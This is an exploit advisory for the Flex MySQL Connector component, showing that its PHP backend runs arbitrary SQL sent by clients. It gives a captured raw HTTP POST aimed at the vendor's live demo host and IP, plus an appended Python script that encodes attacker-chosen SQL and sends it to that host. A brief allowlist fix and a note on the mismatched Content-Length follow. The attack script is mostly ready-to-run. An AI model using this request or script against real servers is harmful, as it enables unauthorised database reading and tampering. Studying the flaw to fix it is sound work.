$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$$                      Flex MySQL Connector Remote SQL Execution Exploit                       $$$
$$$                                                                                              $$$
$$$                        || License:   Commercial                                              $$$
$$$                        || Language:  English                                                 $$$
$$$  Flex MySQL Connector  || Cost:      $45.00                                                  $$$
$$$                        || Platform:  Flash Player 9 | Flash Player 10                        $$$
$$$                        || Demo:      http://flexappsstore.com/flexapps/demo/mysql/           $$$
$$$                                                                                              $$$
$$$                        || Name:      ~Fyodor (aka DungPQ)                                    $$$
$$$  Credit                || Email:     quangdung181188[at]gmail.com                            $$$
$$$                        || Location:  Hanoi, Vietnam                                          $$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

[$] Vulnz Description :

Flex MySQL Connector is a Flex component from FlexAppsStore that lets ActionScript run SQL
through a PHP backend (Flash <=> PHP <=> MySQL). The SQL statement travels inside the request
itself, so anyone can modify it and send the request straight to the PHP backend. In other
words, anyone can run arbitrary SQL statements against the victim's MySQL server => OMG !

[$] Exploitz :

Send an example SQL command to MySQL at http://flexappsstore.com/flexapps/demo/mysql/
-----------------------------------------------------------------------------------
> Dest.IP   = 66.147.242.177
> Dest.PORT = 80

---[Request BOF]---
POST /flexapps/flexmysqlconn.php?irand=0.2112374654971063 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.10
Host: www.flexappsstore.com
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Referer: http://flexappsstore.com/flexapps/demo/mysql/index.swf
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
Content-Length: 89
Content-type: application/x-www-form-urlencoded

fas%5Fdb=flexapps%5Fdemxo&fas%5Fsql=SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig
---[Request EOF]---

(Oh yeah, the SQL command is
SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig => SELECT count(*) as cnt1 FROM tbl_bigbig)

[$] PS: I don't give the full PoC source code. You can make your own PoC in PHP (using fsockopen(), cURL, ...), but if you want, contact me. ^_^

[$] ~Fyodor - The Still Lake
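The request above rebuilt as a script, as an added example that is neither the author's withheld PoC nor the vendor's code: it produces the same form body as the capture for attacker-chosen fas_db / fas_sql values, decodes a captured body back into the statement the backend will execute, and sketches the allowlist the PHP side should use instead. The host, path and Referer are taken from the capture; the irand query parameter is left out on the assumption that it is only a cache-buster, and the NAMED_QUERIES / fas_query allowlist is hypothetical.

```python
"""Reproduction of the Flex MySQL Connector request shown in the advisory.

Added example, not the advisory author's PoC. Everything except run_sql()
runs offline.
"""
import http.client
import urllib.parse

# Taken from the request shown in the advisory.
TARGET_HOST = "www.flexappsstore.com"
TARGET_PATH = "/flexapps/flexmysqlconn.php"
SWF_REFERER = "http://flexappsstore.com/flexapps/demo/mysql/index.swf"
CAPTURED_BODY = ("fas%5Fdb=flexapps%5Fdemxo&fas%5Fsql=SELECT%20count%28%2A%29"
                 "%20as%20cnt1%20FROM%20tbl%5Fbigbig")
DEMO_DB = "flexapps_demxo"
DEMO_SQL = "SELECT count(*) as cnt1 FROM tbl_bigbig"


def flash_encode(text):
    """Percent-encode the way the capture does: every byte that is not an
    ASCII letter or digit (even '_') becomes %XX with upper-case hex.
    urllib.parse.quote() would leave '_' alone, so it cannot reproduce the body."""
    out = []
    for b in text.encode("utf-8"):
        ch = chr(b)
        out.append(ch if b < 128 and ch.isalnum() else "%%%02X" % b)
    return "".join(out)


def encode_body(db, sql):
    """Build the x-www-form-urlencoded body fas_db=<db>&fas_sql=<sql>."""
    return "&".join("%s=%s" % (flash_encode(k), flash_encode(v))
                    for k, v in (("fas_db", db), ("fas_sql", sql)))


def decode_body(body):
    """Recover (database, SQL statement) from a captured request body."""
    params = urllib.parse.parse_qs(body, keep_blank_values=True)
    return params["fas_db"][0], params["fas_sql"][0]


def build_request(db, sql, host=TARGET_HOST, path=TARGET_PATH):
    """Raw HTTP/1.1 request bytes with Content-Length computed from the body.
    Headers are trimmed to the ones the backend plausibly needs (assumption);
    the Referer is kept in case the script checks that the SWF made the call."""
    body = encode_body(db, sql)
    lines = [
        "POST %s HTTP/1.1" % path,
        "Host: %s" % host,
        "Referer: %s" % SWF_REFERER,
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: %d" % len(body),
        "Connection: close",
        "",
        body,
    ]
    return "\r\n".join(lines).encode("ascii")


def run_sql(db, sql, host=TARGET_HOST, path=TARGET_PATH, timeout=10):
    """Send the request over plain HTTP and return (status, response body).
    Needs network access; only use against a host you are authorised to test."""
    conn = http.client.HTTPConnection(host, 80, timeout=timeout)
    conn.request("POST", path, body=encode_body(db, sql), headers={
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer": SWF_REFERER,
    })
    resp = conn.getresponse()
    data = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, data


# What the PHP side should do instead (hypothetical, not the vendor's code):
# the client only names a query, the server owns the SQL text.
NAMED_QUERIES = {
    "bigbig_count": "SELECT count(*) AS cnt1 FROM tbl_bigbig",
}


def server_select_sql(form):
    """Return the SQL to run for a parsed form (parse_qs shape), or None to
    reject the request. Any request still carrying fas_sql is refused."""
    if "fas_sql" in form:
        return None
    name = form.get("fas_query", [""])[0]
    return NAMED_QUERIES.get(name)


if __name__ == "__main__":
    print(build_request(DEMO_DB, DEMO_SQL).decode())
    print(decode_body(CAPTURED_BODY))
```

One caveat when replaying: the body as printed in the advisory is 93 bytes, while the captured Content-Length header says 89, so the listing was evidently edited after capture; build_request() therefore recomputes the length from the body instead of copying the header.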